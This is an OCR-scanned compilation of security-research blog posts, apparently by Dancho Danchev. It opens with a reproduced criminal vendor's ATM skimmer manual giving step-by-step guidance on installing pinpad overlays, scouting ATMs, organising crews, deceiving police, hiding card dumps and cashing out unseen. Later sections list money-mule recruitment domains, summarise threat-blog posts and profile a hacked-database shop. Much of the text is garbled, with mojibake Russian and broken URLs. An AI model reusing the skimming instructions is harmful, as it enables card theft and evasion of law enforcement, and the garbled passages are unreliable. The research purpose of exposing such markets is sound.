Lithium-Polymer/(Li-Po) 3.7v Generic charger for charging the battery of your pinpad. We can 
include this with the full kit for an extra cost. You may contact to us if you bought a Li-Po 
charger and want to use it with your pinpad. 


You must be extremely careful when plugging the cable into the pinpad! There was not 
enough space in the pinpad for us to place a generic USB socket that eliminates user mistakes 
when plugging in the cable. We used plain socket that allows user to plug cable in any 
direction/position. If you plug the cable in the wrong direction/position then your pinpad 
electronics may be damaged. There also a risk to your battery. So pay special attention when 
plugging the cable into your pinpad for data transfer and/or charging. Check the picture below 
for concise instructions on how to plug the cable into your pinpad. 


Follow these steps for easy plugging: 

1. Identify the Red Wire on the cable’s socket 

2. Identify the Red Wire on pinpads Socket 

3. Red wire of pinpads socket should always be near the Crystal, and should join with the 
other red wire. 

4. Then plug it like this: 


Information on Installing and Removing to/from ATM: 


You should use transparent fast glues for glue your Pinpad. You have to be very careful 
on NOT TO GLUE the Membrane of your Pinpad. You only need to glue the back of the frame of 
the Pinpad, only places where it touches the ATM. Again, no membrane or keys!!! You should 
use 2 holes designed for removing Pinpad from the ATM. You may use a small screwdriver or 
knife or similar. 


You have to be very careful when removing the pinpad from the ATM. You should not 
damage membrane of the pinpad when using screwdriver or knife to remove it. Several 
practice attempts, on a flat surface are recommended. 


You should try with very small amount of glue for your tests to see and understand how 
it sticks. Then you should decide what amount of glue will be used when you are on the job. 
Your tests are the key to your success. Test your skimmer on the ATM with no Glue/Less Glue 
etc. for experience. Never start to skimming before feeling you understand all the logic. 


4106 


—- - 


‘ico 16:09 61— 


Sle. EE 


Our Software Description 


To work with a skimmer, a computer is necessary of course. You need to save your 
dumps (card data tracks) there! We will provide you with software, which can completely 
contro! your skimmer. Using this software, you can download dumps from skimmer/input 
them from SMS, remove them from skimmer unit, etc. 


The program saves everything in crypted form. So that you don’t have to worry about 
being ripped off. No one will be able to retrieve your data without the password. The password 
is included in the complete package, or can be sent separately online for security purposes. 
Each skimmer is basically a small computer, with a processor, flash storage, the internals of 
a SE850i mobile(cellular/GSM) phone, through which it sends info, and it has an EEPROM chip 
which boots up and operates the unit. So that takes care of software and passwords. Software 
is supplied in the complete set with the equipment directly to the buyer, even if transaction is 
done through some mediator, and passwords are given only to the buyer. We make so that 
the mediator cannot obtain both the software and the passwords. 
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The program does not show dumps on the screen. Also it does not preserve dumps in 
the open form. With the retention they are ciphered by a serious key. At the start of program 
it will request your password. But if password is introduced incorrect that it simply closes 
down and prints a system error on the screen. This creates the impression that the program 
is simply nonworking. And if you will not input the correct password, there’s no way to even 
know what kind of program it is. This was created so that non-critical people with an attempt 
at the start would not attempt to select password. Let’s just say suddenly, the police get the 
laptop, on which the program is installed. Naturally, they will ask you about the password. If 
you are creative, you will give them a fake password, which they enter it, and the program 
will simply shut down and writes that an error occurred. This will give the impression that 
the program is nonworking. And you can boldly tell that the "program never worked, and | 
just forgot to delete it". The dumps are stored in an encrypted file, which it is not possible to 
decrypt. There will be no evidence left on your computer, once the police do not get a hold of 
the password. 


The software itself is easy to use. There is no extra options or excess instructions. It is 
self explanatory, but full instructions are included with the full kit. If you have any other 
questions we will try our best to answer them from our administration team or our software 
developers. 
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Safety: 


We are often asked questions about safety when we are working with skimmers. On 
this page, | will try to give some good safety advice for cashing out and operating a successful 
skimming operation. 


Observation: 

It is recommended to observe the target ATM, unobtrusively for 1-2 days before hand. Record 
at what times the ATM is busy, what times it is quiet, and at what time it is serviced and money 
is put into the machine, if it is a free standing unit. 


Equipment preparation: 

It is recommended to check all your equipment before the installation. Make sure that you 
have practised with some dummy ATM cards before hand and have transferred your own ATM 
card, or similar into track data, SMS, decrypt, and write to a "white card" with your MSR206 
card writer. 
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Work for the fitter/installer: 

The installer must be good with their hands. They must accurately and rapidly carry out his 
work, and quietly leave the area. Some crews will have their fitter dress up in a uniform to 
make them appear to be servicing the ATM. This is not such a good idea. Just go to the ATM 
when it is quiet. Perhaps have an assistant stand a distance away, to distract passers-by or 
other users of the ATM. The whole process can take less than 30 seconds. 


Operation of the device: 

Place, and the time of the installation should be selected beforehand. An observation point 
might be necessary. There should be somewhere to safely park your car from which to observe 
the operation of the skimmer and pinpad. If you are waiting in a car, it is not recommended 
that you have a laptop + msr + phone receiving and writing the data. If the operation is 
busted in this manner, you lose everything. However, if you are at home, you will have at least 
several hours in which to write the cards and cash them out. Your observation person should 
have enough food, water, etc to last in the car for the complete duration of the operation if 
possible. One plan that some crews use now is observation from an apartment or hotel close 
to the ATM. With this, you can cut down on the number of your crew. But be careful use fake 
identification if you can. 
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Full details of the installation are described with pictures in a series of PDF files included on 
the software and instructions DVD. The fitter/installer should put a card into the machine and 
reject it quickly when fitting. The receiver, working on the "home" computer, will receive the 
track, and confirm that it stuck on properly. 99 % of the time, it sticks no problem. This is also 
useful to find that the card is ejecting properly. 
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When removing equipment, your crew should be trained and ready. Some crews do not 
risk withdrawing equipment as the average 1-day run will net $20,000- $50,000 USD depena- 
ing on where you are. However if you are confident about removing it, you should take it to 
run the operation again. If apprehended while removing the equipment, the remover should 
protest innocence. They should say that they saw something suspicious, and were trying 
to take it off the ATM to being to police/bank. The crew member should look and act like a 
respectable citizen. You do not need a crew of thugs for this operation. You need a well-spoken, 
relaxed, confident team. It can be done with just 2 people, but 3 is recommended. Observing 
the guy removing the kit is a good idea, and walkie-talkies are useful. If the observer sees 
someone approaching the removal guy, he should "squak" his walkie-talkie, and the remover 
can disappear quickly. 
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Cashing out the money: 

On many ATMs, there is a monitoring camera. Cameras are usually motion activated. We 
advise that you do not stay at one ATM more than 5 minutes, and do not tie up an ATM if there 
are people in the queue. Do not always cash out at an ATM belonging to one single bank, nor 
should you ever cash out your cards on the ATM that you skimmed them on. 
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Price List 
| Model | GSM: 
Wincor Nixdorf €2900 €5600 
Procash 2150 


*Our Diebold are easily adapted to fit almost all Diebold machines. 
Please contact us if you have any special requests. 


USB memory: 


The Kit includes a software dvd (with full instructions), MSR206, 
Skimmer + Pinpad, and encryption key to decode dumps which are 
encrypted on the devices. 


Many crews will have several people working on cashing out, and they work 10 cards 
per person per time, all returning the money to the controller periodically. If you are cashing 
out at night at a quiet ATM, having hoods up is a good idea to prevent the camera from seeing 
you.That’s just about everything you need to know to operate a safe, extremely lucrative ATM 
skimming business. 
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The Kit includes a software dvd (with full instructions), MSR206, Skimmer + Pinpad, and 
encryption key to decode dumps which are encrypted on the devices. Note: Only skimmed 
tracks are encrypted, pins are not encrypted. Rental Schemes are available, where we keep 
the encryption key for the 1st operation of the skimmer, and provide you with 20 unencrypted 
dumps + pins. This rental scheme costs €1400 for USB kits, and €2200 for GSM kits. 


My initial discovery of this cybercrime-friendly market proposition, coincides with the 
publication of a related post back in 2008, for the first time ever publicly disclosing important 
details regarding the emergence of [3]ATM Skimmers with built-in GSM modules. 


Nowadays, these are everyday reality. 


Updates will be posted as soon as new developments take place. 


1. http://ddanchev. blogspot . com/2008/08/facebook-malware-campaigns-rotating. html 
2. http://www. bothunter .net/live/2011-10-15/index. html 


3. http: //www.zdnet .com/blog/security/scammers- introduce-atm-skimmers-with-built-in-sms-notification/2000 
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9.1.4 Raw Historical OSINT - Keeping Money Mule Recruiters on a Short Leash - Part 
Twelve (2013-01-07 22:56) 


In the following (historical) intelligence brief, I’ll provide you with some raw domain data of 
fake companies that are known to have attempted to recruit money mules over the past 2 
years. 


The domains listed here were registered by the same gang of cybercriminals that I’ve 
been extensively profiling in previous "Keeping Money Mule Recruiters on a Short Leash" 
posts. 


Money mule recruitment domains: 
compassllc-usa.com 
linkllc-uk.com 
very-compllc.com 
click-n-art.com 
infotechgroup-inc.com 
amplitude-groupmain.tw 
magnet-groupinc.cc 
allston-groupsec.cc 
DEVELOP-INC.COM 
MERCYGROUPNET.NET 
MERCY-INC.COM 
SOLARISGROUPINC.COM 
SOLARISGROUPNET.NET 
JVC-INC.COM 
JVCGROUPNET.NET 
EVOLVINGSYSINC.NET 
ATCANETWORKS.NET 
ATCA-INC.COM 
GALLEOGROUPNET. NET 
GALLEO-INC.COM 
EVOLVINGSYSINC.NET 
EVOLVING-INC.COM 
NETMARKET-INC.COM 
NETMARKETTECH.NET 
INFOTECH-GROUPCO.NET 
INFOTECH-GROUPINC.COM 
INFOTECHGROUP-INC.COM 
BANDS-GROUPSVC.COM 
BANDS-INC.COM 
BANDSGROUP-INC.NET 
BANDSGROUPNET.CC 
ICT-GROUPCO.COM 
ICT-GROUPSVC.NET 
ICTGROUPINC.COM 
ICTGROUPNET.CC 
GIANT-GROUPCO.NET 
GIANT-GROUPINC.COM 
GIANT-GROUPNET.CC 
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GIANTGROUPINC.COM 
IMPERIAL-GROUPINC.COM 
IMPERIAL-GROUPSVC.NET 
IMPERIALGROUPCO.COM 
HOSTGROUP-INC.COM 
HOSTGROUPINC.COM 
HOSTGROUPNET.CC 
HOST-GROUPSVC.NET 
CNLGROUP-INC.CC 
CNLGROUPNET. NET 
CNL-GROUPSVC.COM 
CNL-INC.COM 
bands-groupsvc.com 
bands-inc.com 
bandsgroup-inc.net 
bandsgroupnet.cc 
cnl-groupsvc.com 
cnl-inc.com 
cnigroup-inc.cc 
cnigroupnet.net 
giant-groupco.net 
giant-groupinc.com 
giant-groupnet.cc 
giantgroupinc.com 
host-groupsvc.net 
hostgroup-inc.com 
hostgroupinc.com 
hostgroupnet.cc 
ict-groupco.com 
ict-groupsvc.net 
ictgroupinc.com 
ictgroupnet.cc 
imperial-groupinc.com 
imperial-groupsvc.net 
imperialgroupco.com 
infotech-groupco.net 
infotech-groupinc.com 
infotechgroup-inc.com 
itcom-groupco.net 
itcom-groupfine.cc 
itcom-groupsvc.com 
itcomgroup-inc.com 
mgm-groupsvc.com 
mgmgroup-inc.net 
mgmgroupinc.com 
mgmgroupnet.cc 
usi-groupinc.net 
usigroup-inc.com 
usigroupinc.com 
usigroupnet.cc 
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NOVARIS-GROUPLLC. TW 
NOVARISGROUPMAIN.TW 
NOVARIS-GROUPORG.CC 
VITAL-GROUPCO.CC 
VITAL-GROUPCO.TW 
VITAL-GROUPINC.TW 
PERSEUS-GROUPFINE.TW 
PERSEUS-GROUPINC.TW 
PERSEUSGROUPLLC.CC 


Consider going through my previous research into one of the most popular 'risk-forwarding’ 
tactic used by cybercriminals, namely, money mule recruitment. 


Related posts on money mule recruitment: 

[1]Keeping Money Mule Recruiters on a Short Leash - Part Eleven 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Ten 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Nine 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[7]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[8]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[9]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[10]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[12]Money Mule Recruiters on Yahoo!’s Web Hosting 

[13]Dissecting an Ongoing Money Mule Recruitment Campaign 
[14]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[15]Keeping Reshipping Mule Recruiters on a Short Leash 
[16]Keeping Money Mule Recruiters on a Short Leash 
[17]Standardizing the Money Mule Recruitment Process 

[18]Inside a Money Laundering Group’s Spamming Operations 
[19]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[20]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [21]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2011/08/keeping-money-mule-recruiters-on-short.htm 
2. http: //ddanchev. blogspot .com/2011/07/keeping-money-mule-recruiters-on-short.htm 
3. 


ttp://ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 


4. http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.html 
5 
6 

7 

a 

9 
10. 
11. http: //ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short .htm 
12. 

13. 
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14. 
15. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 
16. 
17. 
18. http://ddanchev. blogspot .com/2009/05/inside-money- laundering- groups- spamming. html 
19. 
20. 

21. 


9.1.5 Raw Historical OSINT - Keeping Money Mule Recruiters on a Short Leash - Part 
Twelve (2013-01-07 22:56) 


In the following (historical) intelligence brief, I’ll provide you with some raw domain data of 
fake companies that are known to have attempted to recruit money mules over the past 2 
years. 


The domains listed here were registered by the same gang of cybercriminals that I’ve 
been extensively profiling in previous "Keeping Money Mule Recruiters on a Short Leash" 
posts. 


Money mule recruitment domains: 


compassllc-usa.com 
linkllc-uk.com 
very-compllc.com 
click-n-art.com 
infotechgroup-inc.com 
amplitude-groupmain.tw 
magnet-groupinc.cc 
allston-groupsec.cc 
DEVELOP-INC.COM 
MERCYGROUPNET.NET 
MERCY-INC.COM 
SOLARISGROUPINC.COM 
SOLARISGROUPNET. NET 
JVC-INC.COM 
JVCGROUPNET.NET 
EVOLVINGSYSINC.NET 
ATCANETWORKS.NET 
ATCA-INC.COM 
GALLEOGROUPNET.NET 
GALLEO-INC.COM 
EVOLVINGSYSINC.NET 
EVOLVING-INC.COM 
NETMARKET-INC.COM 
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NETMARKETTECH.NET 
INFOTECH-GROUPCO.NET 
INFOTECH-GROUPINC.COM 
INFOTECHGROUP-INC.COM 
BANDS-GROUPSVC.COM 
BANDS-INC.COM 
BANDSGROUP-INC.NET 
BANDSGROUPNET.CC 
ICT-GROUPCO.COM 
ICT-GROUPSVC.NET 
ICTGROUPINC.COM 
ICTGROUPNET.CC 
GIANT-GROUPCO.NET 
GIANT-GROUPINC.COM 
GIANT-GROUPNET.CC 
GIANTGROUPINC.COM 
IMPERIAL-GROUPINC.COM 
IMPERIAL-GROUPSVC.NET 
IMPERIALGROUPCO.COM 
HOSTGROUP-INC.COM 
HOSTGROUPINC.COM 
HOSTGROUPNET.CC 
HOST-GROUPSVC.NET 
CNLGROUP-INC.CC 
CNLGROUPNET.NET 
CNL-GROUPSVC.COM 
CNL-INC.COM 
bands-groupsvc.com 
bands-inc.com 
bandsgroup-inc.net 
bandsgroupnet.cc 
cnl-groupsvc.com 
cnl-inc.com 
cnigroup-inc.cc 
cnigroupnet.net 
giant-groupco.net 
giant-groupinc.com 
giant-groupnet.cc 
giantgroupinc.com 
host-groupsvc.net 
hostgroup-inc.com 
hostgroupinc.com 
hostgroupnet.cc 
ict-groupco.com 
ict-groupsvc.net 
ictgroupinc.com 
ictgroupnet.cc 
imperial-groupinc.com 
imperial-groupsvc.net 
imperialgroupco.com 
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infotech-groupco.net 
infotech-groupinc.com 
infotechgroup-inc.com 
itcom-groupco.net 
itcom-groupfine.cc 
itcom-groupsvc.com 
itcomgroup-inc.com 
mgm-groupsvc.com 
mgmgroup-inc.net 
mgmgroupinc.com 
mgmgroupnet.cc 
usi-groupinc.net 
usigroup-inc.com 
usigroupinc.com 
usigroupnet.cc 
NOVARIS-GROUPLLC.TW 
NOVARISGROUPMAIN.TW 
NOVARIS-GROUPORG.CC 
VITAL-GROUPCO.CC 
VITAL-GROUPCO.TW 
VITAL-GROUPINC. TW 
PERSEUS-GROUPFINE.TW 
PERSEUS-GROUPINC.TW 
PERSEUSGROUPLLC.CC 


Consider going through my previous research into one of the most popular ‘risk-forwarding’ 
tactic used by cybercriminals, namely, money mule recruitment. 


Related posts on money mule recruitment: 

[1]Keeping Money Mule Recruiters on a Short Leash - Part Eleven 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Ten 

[3]Keeping Money Mule Recruiters on a Short Leash - Part Nine 

[4]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Seven 

[6]Keeping Money Mule Recruiters on a Short Leash - Part Six 

[7]Keeping Money Mule Recruiters on a Short Leash - Part Five 


[8]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
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http: //ddanchev.blogspot.com/ 
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9.1.6 Summarizing Webroot’s Threat Blog Posts for December (2013-01-09 19:34) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


i Py Archives 
Spamvertised AICPA themed emails Sead - 
- - - 
serve client-side exploits and malware 
lanua ¥ 9, 20 12 ar Referral Program 
WK WOW o 2? Vote Takk about . win win 
Free security for your 
By Dancho Danchev friends AND a donation 
to charity 
Certified Public Accountar PAs) are a common target f yt nals. Throughout 2012, we 
intercepted several campaigns directly targeting CPAs in an attempt to trick them int king on the 
mabciow nks found m the ema Once they k on any of the link theyre automatically ex; ed t Free tools 
the client-side exploits served by the latest version of the Black Hole Exploit Kit Haven't tried Webroot 
ecureAnywhwere tc 
in this post, I'l analyze one of the most recently spamvertised campaigns impersonating the American = remove an infectic 
Institute of Certified Public Accountants, also known as AICPA Download a free trial 
Read More » ecureAnywher 
program/ma 
ssistance 
Tell your friends: Wi Facebook s [J twitters [F} Digg <3 Recdit €} StumbleUpon [i] Email |) More Open a support ticket 
Like this: * Like Be the first to like tt rm Aigengah 
specif URL r IP 
By ddancher | Poste Botret activity, Downloaders, Exploits, mal-effects, malware, social engineering, spam, Threat Research Check the reputation of 
ga. AICPA, Black Hole Exploit Kit, CPA, cybercrime, Exploits, Malicious Software, malware, security, social engineering, apam, a@ URL or IP address 


Span Campaign, Sparnvertised, vuloerabilites 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for December, 
2012. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]DIY malicious domain name registering service spotted in the wild 

02. [4]Fake ‘FedEx Tracking Number’ themed emails lead to malware 

03. [5]Bogus ‘Facebook Account Cancellation Request’ themed emails serve client-side 
exploits and malware 

04. [6]Malicious ‘Security Update for Banking Accounts’ emails lead to Black Hole Exploit Kit 
05. [7]A peek inside a boutique cybercrime-friendly E-shop - part five 

06. [8]Fake ‘Flight Reservation Confirmations’ themed emails lead to Black Hole Exploit Kit 
07. [9]Malicious ‘Sendspace File Delivery Notifications’ lead to Black Hole Exploit Kit 

08. [10]Fake Chase ‘Merchant Billing Statement’ themed emails lead to malware 

09. [11]Cybercriminals entice potential cybercriminals into purchasing bogus credit cards 
data 

10. [12]Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions 

11. [13]Fake ‘Citi Account Alert’ themed emails lead to Black Hole Exploit Kit 

12. [14]Spamvertised ‘Work at Home” scams impersonating CNBC spotted in the wild 

13. [15]Pharmaceutical scammers spamvertise YouTube themed emails, entice users into 
purchasing counterfeit drugs 
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14. [16]Cybercriminals resume spamvertising British Airways themed E-ticket receipts, serve 
malware 

15. [17]Fake ‘UPS Delivery Confirmation Failed’ themed emails lead to Black Hole Exploit Kit 
16. [18]Webroot’s Threat Blog Most Popular Posts for 2012 


This post has been reproduced from [19]Dancho Danchev’s blog. Follow him 
[20]Jon Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3 


ttp://blog.webroot .com/2012/12/03/diy-malicious—domain-name-registering-service-spotted-in-the-wild/ 


4. http: //blog.webroot.com/2012/12/04/fake-fedex-tracking-number-themed-emails-lead-to-malware/ 


ttp://blog.webroot .com/2012/12/05/bogus- facebook-account-cancellation-request-themed-emails-serve-client 


side-exploits-and-malware/ 


6. http: //blog.webroot.com/2012/12/07/malicious-security-update-for-banking-accounts-emails-lead-to-black-ho 
le-exploit-kit/ 


7. http: //blog.webroot.com/2012/12/10/a-peek- inside-a-boutique-cybercrime-friendly-e-shop-part-five/ 


8. http://blog.webroot .com/2012/12/11/fake-flight-reservation-confirmations-themed-emails-lead-to-black-hole 
exploit-kit/ 
9. http://blog.webroot .com/2012/12/12/malicious-sendspace-file-delivery-notifications-lead-to-black-hole-exp 


15. ttp://blog.webroot .com/2012/12/25/pharmaceutical-scammers-spamvertise-youtube-themed-emails-entice-use 


rs-into-purchasing-counterfeit-drugs/ 


18. 
19, 
20. 
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9.2 February 


9.2.1 Summarizing ZDNet’s Zero Day Posts for January (2013-02-04 22:38) 


ZDNet Bib 


Zer 


The best of ZDNet, delivered 


Oo Day ZDNet Newsletters 


Get the best of ZDNet delivered straight to 


Ryan Naraine Latest Posts 


NetSeer suffers hack, triggers Google malware warnings 


Dancho Danchev 


Dancho Darxivev 15 an 


Top Stories 


Obama can ‘order pre-emptive cyber-attack’ if U.S. faces 
threat 


Anonymous posts over 4000 U.S. bank executive 
credentials a 
Events Calendar 


ae S$ calet 
EN oe a 


. ' 


s 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for January, 2013. 
You can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


01. [3]Dutch security researchers dissect the Pobelka botnet 

02. [4]ESPN’s ScoreCenter for iOS sends passwords in clear-text, susceptible to XSS flaw 
03. [5]Report: AutoRun malware infections continue topping the charts 

04. [6]Comparative review: Opera leads in browser anti-phishing protection 

05. [7]ltalian-language page at MSN redirects to Cool Exploit Kit, serves ransomware 
06. [8]WordPress releases version 3.5.1, fixes 3 security issues 

07. [9]Targeted attack against UAE activist utilizes CVE-2013-0422, drops malware 
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This post has been reproduced from [10]Dancho Danchev’s blog. Follow him [11]Jon 
Twitter. 


1. http: //zdnet.com/blog/securit 
2. http: //feeds.feedburner .com/zdnet/securit 


ttp://www.zdnet .com/dutch-security-researchers-dissect-the-pobelka-botnet- 700000997 1/ 


zdnet .com/espns-scorecenter-for-ios-sends-passwords-in-clear-text-susceptible-to-xss-flaw-7000 


com/report-autorun-malware-infections-continue-topping-the-charts-7000010028/ 
com/comparative-review- opera-leads- in-browser-anti-phishing-protection-7000010039/ 


com/italian-language-page-at-msn-redirects-to-cool-exploit-kit-serves-ransomware- 7000010 


. http://www. com/wordpress-releases-version-3-5-1-fixes-3-security-issues-—7000010355/ 


. http://www. com/targeted-attack-against-uae-activist-utilizes-cve-2013-0422-drops-malware- 700001064! 


9 
10. http: //ddanchev.blogspot.com/ 
11. http://twitter.com/danchodanche 


9.2.2 Summarizing Webroot’s Threat Blog Posts for January (2013-02-04 23:14) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


Fake FedEx ‘Tracking ID/Tracking ee : 
Number/ Tracking Detail’ themed emails 
lead to malware Ta Se 8 win 


eeeRE O friends AND 9 donation 
to charity 


Referral Program 


By Dancho Danchev 


Free tools 


Black Hole Exploit xit 
i a Downtoad a free trial 


Fedtx , b this campaign 
Open o support ticket 
Read More 
Check the reputation of 
Ted your trend Bi Facedook + (J twmere G) 0iop <3 Recat © sumbdielpen |B Emat [&) tore @ URL of IP address 
t lie Connect with ws! 
p e Cwitter 
Fake Booking.com ‘Credit Card was not 
Accepted’ themed emails lead facebook 
to malware 
i" Yougie: 
week 0 
By Dancho Danchev Google + 
C f Booking com t 
Subscribe by email 
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The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for January, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


M 


01. [3]Spamvertised ‘Your Recent eBill from Verizon Wireless’ themed emails serve client-side 
exploits and malware 

02. [4]Fake BBB (Better Business Bureau) Notifications lead to Black Hole Exploit Kit 

03. [5]‘Attention! Changes in the bank reports!’ themed emails lead to Black Hole Exploit Kit 
04. [6]Fake ‘You have made an Ebay purchase’ themed emails lead to client-side exploits and 
malware 

05. [7]A peek inside a boutique cybercrime-friendly E-shop - part six 

06. [8]Black Hole Exploit Kit author’s ‘vertical market integration’ fuels growth in malicious 
Web activity 

07. [9]Spamvertised AICPA themed emails serve client-side exploits and malware 

08. [10]‘Please confirm your U.S Airways online registration’ themed emails lead to Black Hole 
Exploit Kit 

09. [11]Malicious DIY Java applet distribution platforms going mainstream 

10. [12]Fake ‘ADP Speedy Notifications’ lead to client-side exploits and malware 

11. [13]Cybercriminals release automatic CAPTCHA-solving bogus Youtube account generating 
tool 

12. [14]‘Batch Payment File Declined’ EFTPS themed emails lead to Black Hole Exploit Kit 

13. [15]Cybercriminals resume spamvertising fake Vodafone ‘A new picture or video message 
themed emails, serve malware 

14, [16]Leaked DIY malware generating tool spotted in the wild 

15. [17]Email hacking for hire going mainstream - part three 

16. [18]Android malware spreads through compromised legitimate Web sites 

17. [19]Fake Intuit ‘Direct Deposit Service Informer’ themed emails lead to Black Hole Exploit 
Kit 

18. [20]Fake LinkedIn ‘Invitation Notifications’ themed emails lead to client-side exploits and 
malware 

19, [21]Novice cybercriminals experiment with DIY ransomware tools 

20. [22]Bogus ‘Your Paypal Transaction Confirmation’ themed emails lead to Black Hole Exploit 
Kit 

21. [23]Fake ‘FedEx Online Billing - Invoice Prepared to be Paid’ themed emails lead to Black 
Hole Exploit Kit 

22. [24]A peek inside a DIY password stealing malware 

23. [25]Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side 
exploits and malware 


’ 


This post has been reproduced from [26]Dancho Danchev’s blog. Follow him 
[27]on Twitter. 


ttp://blog.webroot.com/ 


it, 
2. http://feeds2.feedburner.com/WebrootThreatBlog 
3: 


ttp://blog. webroot .com/2013/01/01/spamvertised-your-recent-ebill-from-verizon-wireless-themed-emails-se 


e-client-side-exploits-and-malware/ 


4. http://blog. webroot .com/2013/01/02/fake-bbb-better-business—bureau-notifications-lead-to-black-hole-explo 


5. http: //blog. webroot. com/2013/01/03/attention-changes-in-the-bank-reports-themed-emails-lead-to-black-hole 
exploit-kit/ 


6. http://blog. webroot .com/2013/01/04/fake- you-have-made-an- ebay-purchase-themed-emails-lead-to-client-side- 


exploits-and-malware/ 


7. http: //blog.webroot .com/2013/01/07/a-peek- inside-a-boutique-cybercrime-friendly-e-shop-part-six/ 
8. bhttp://blog.webroot .com/2013/01/08/black-hole-exploit-kit-authors-vertical-market-integration-fuels-growt 


h-in-malicious-web-activity/ 

9. http://blog.webroot.com/2013/01/09/spamvertised-aicpa-themed-emails-serve-client-side-exploits-and-malwa 
10. http://blog.webroot .com/2013/01/10/please-confirm-your-u-s-airways-online-registration-themed-emails-le 
11. http://blog.webroot.com/2013/01/11/malicious-diy- java-applet-distribution-platforms-going-mainstream/ 
12. http://blog.webroot .com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malwa 
re/ 
13. ttp://blog.webroot .com/2013/01/15/cybercriminals-release-automatic-captcha-solving-bogus- youtube-acco 
14. http://blog.webroot .com/2013/01/16/batch-payment-file-declined-eftps-themed-emails-lead-to-black-hole-e 
15. bttp://blog.webroot .com/2013/01/17/cybercriminals-resume-spamvertising-fake-vodafone-a-new-picture-or- 


ideo-message-themed-emails-serve-malware/ 


16. http: //blog. webroot .com/2013/01/18/leaked-diy-malware-generating-tool-spotted-in-the-wild/ 


17. http: //blog.webroot.com/2013/01/21/email-hacking- for-hire-going-mainstream-part-three/ 

18. http://blog. webroot .com/2013/01/22/android-malware-spreads-through-compromised-legitimate-web-sites/ 

19. http://blog.webroot .com/2013/01/23/fake-intuit-direct-deposit-service-informer-themed-emails-lead-to-b 
20. http://blog.webroot .com/2013/01/24/fake-linkedin-invitation-notifications-themed-emails-lead-to-client- 


side-exploits-and-malware/ 


21. http: //blog. webroot. com/2013/01/25/novice-cybercriminals-experiment-with-diy-ransomware-tools/ 


22. http://blog.webroot .com/2013/01/28/bogus-your-paypal-transaction-confirmation-themed-emails-lead-to-bla 


ck-hole-exploit-kit/ 


23. http://blog.webroot.com/2013/01/29/fake-fedex-online-billing-invoice-prepared-to-be-paid-themed-emails- 


lead-to-black-hole-exploit-kit/ 


24. http: //blog. webroot. com/2013/01/30/a-peek- inside-a-diy-password-stealing-malware/ 


25. ttp://blog.webroot .com/2013/01/31/malicious-facebook-account-cancellation-request-themed-emails-serve- 


client-side-exploits-and-malware/ 
26. http: //ddanchev.blogspot.com/ 
27. http://twitter.com/danchodanche 


9.2.3 Historical OSINT - Hacked Databases Offered for Sale (2013-02-06 02:03) 


In the wake of the recently announced security breaches at the [1]NYTimes, [2]WSJ, and the 
[3]Washington Post, | decided to shed more light on what happens once a database gets 
compromised by Russian cybercriminals, compared to (Supposedly) Chinese spies, with the 
idea to provide factual evidence that these breaches are just the tip of the iceberg. 


In this intelligence brief, I’ll profile a service that was originally operating throughout the 
entire 2009, selling access to compromised databases of multiple high-trafficked Web sites, 
through the direct compromise of their databases, hence, the name of the service - GiveMeDB. 
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| Tnasxas | Npsitc | Npseuna | O Hac | KoxTaxre: | 


GiveMeDB Service 


Mbi npegctasnaem Bam cepsuc no npogaxe 6a3 AaHHbIx CO 

B3NOM@HHbIX PeCyPCOB pasnuyHo TemaTuKM. Y Hac Bel Bcerga moxKeTe IIpaiic: 
Npvobpectu Heobxogumblit MaTepvan nog Bawm yenu. Mei npegnaraem 

WMpOKMM ACCOPTMMeHT, CpeAM KOTOpOro npucyTcTBytoT Job/Dating @ Job Bases 


: ® Dsting Bases 
/Finance u apyrnue Saab. @ Finance Bases 


e @ Other Bases 
Buumauue! Mbi He reHepum mu He CoOmpaem Ga3bi c Beb'a, B HaweM 


Npalice NpucyTcTBytoT TONbKO B3snomaHHble Baabi. B cnyyae kakux-nubo 
COMHEHMIi MbI BCE a FOTOBbI AOKa3aTb NPMHAANEKHOCTb Oaabl K TOMY KoutTakTBI: 


unu MHomy pecypcy. 


— | ICQ: 9348793 - Ru 


—Buumanne! Matepuanbi calita He NpoTMBOpeYaT 3aKOHOsaTeNbcTBy = f= 
Poccun, ctpad CHI, Esponsi u CLUA. Mbi He pacnpoctpaHaem ICQ: 5190451 - En 


OXpaHAeMYHO 3aKOHOM MHopmMalMt, a NMWb npegocteperaem 
Bnagenbules CaliTOB 0 BO3MOXHbIM Npobnemax B ciepe 
MHopmMayMoHHON Ge3zonacHoctn. 


Agmuxuctpauma GiveMeDB.com 


